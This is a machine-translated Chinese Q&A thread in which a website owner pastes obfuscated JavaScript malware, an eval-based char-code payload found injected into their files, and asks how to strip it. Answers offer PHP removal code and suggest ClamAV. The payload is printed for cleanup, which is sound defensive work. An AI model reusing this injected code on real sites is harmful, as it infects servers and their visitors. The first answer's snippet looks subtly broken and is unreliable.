1

我的一个网站遭到恶意软件攻击。他们添加到我的 js 文件中的代码如下所示:

/*7e5a0c*/
v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,117,102,95,104,115,30,61,31,98,111,98,115,109,100,108,116,45,97,114,100,95,116,100,67,108,100,107,101,109,114,40,38,103,102,113,95,109,100,37,41,58,11,10,12,8,32,31,30,32,116,101,97,103,114,46,114,112,99,31,59,32,38,102,116,115,110,58,46,45,111,105,110,97,119,106,97,108,44,114,116,45,99,110,115,110,115,47,51,45,110,104,111,37,59,12,8,32,31,30,32,116,101,97,103,114,46,114,114,121,107,99,46,111,109,115,104,114,105,110,108,32,60,30,39,96,96,115,110,106,117,115,99,39,58,11,10,31,30,32,31,115,103,96,102,116,45,113,116,120,106,101,45,96,111,113,98,101,113,30,61,31,37,48,38,57,13,9,30,32,31,30,117,102,95,104,115,44,115,115,119,108,100,44,104,100,103,103,103,114,32,60,30,39,48,110,120,38,57,13,9,30,32,31,30,117,102,95,104,115,44,115,115,119,108,100,44,119,104,98,116,103,30,61,31,37,49,111,118,39,58,11,10,31,30,32,31,115,103,96,102,116,45,113,116,120,106,101,45,106,101,101,114,32,60,30,39,48,110,120,38,57,13,9,30,32,31,30,117,102,95,104,115,44,115,115,119,108,100,44,116,110,110,32,60,30,39,48,110,120,38,57,13,9,11,10,31,30,32,31,103,102,31,38,33,99,109,99,116,107,101,109,114,46,102,99,116,68,106,101,108,99,110,115,64,121,72,98,40,38,115,103,96,102,116,38,39,41,31,121,13,9,30,32,31,30,32,31,30,32,99,109,99,116,107,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,117,102,95,104,115,90,39,61,58,47,99,103,118,61,37,41,58,11,10,31,30,32,31,30,32,31,30,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,65,119,73,99,38,39,116,101,97,103,114,39,40,44,97,111,110,101,109,98,67,103,103,108,99,38,117,102,95,104,115,39,59,12,8,32,31,30,32,124,11,10,124,39,40,40,57);}w=f;s=[];for(i=0;-i+492!=0;i+=1){j=i;if(e&&(031==0x19))s=s+String.fromCharCode((1*w[j]+j%3));}e(s)
/*/7e5a0c*/

他们添加到我的 php 和 html 文件中的代码略有不同,我如何编写一个 php 脚本来单步执行我的所有站点文件并删除 2 个标签之间的任何文本,例如在上面的代码中,我会删除它介于 / 7e5a0c / 和 / 7e5a0c /之间的所有内容

4

2 回答 2

1

我认为你可以让这两个函数变宽:file_get_contents:http ://php.net/manual/fr/function.file-get-contents.php explode: http: //php.net/manual/fr/function。爆炸.php

就像是 :

$c = file_get_contents('yourfile.php');
$a= explode('/*7e5a0c*/', $c);

您的代码没有“病毒”:

$r = $a[0].$a[2]

不确定它是否删除了“/ 7e5a0c /”,如果是,请尝试:

str_replace("/*7e5a0c*/", "", $r);

编辑:文本编辑器(记事本++)搜索功能也可以帮助你。

于 2012-11-23T14:12:47.537 回答
0 
function removeTag($text, $tagStart, $tagEnd) {
    while (($posStart = strpos($text, $tagStart)) !== false) {
        $posEnd = strpos($text, $tagEnd, $posStart + strlen($tagStart));
        if ($posEnd === false) return $text;
        $text = substr($text, 0, $posStart) . substr($text, $posEnd + strlen($tagEnd));
    }
    return $text;
}

但我宁愿建议使用像clamAV这样的命令行病毒扫描程序来扫描您的文件

于 2012-11-23T14:15:06.857 回答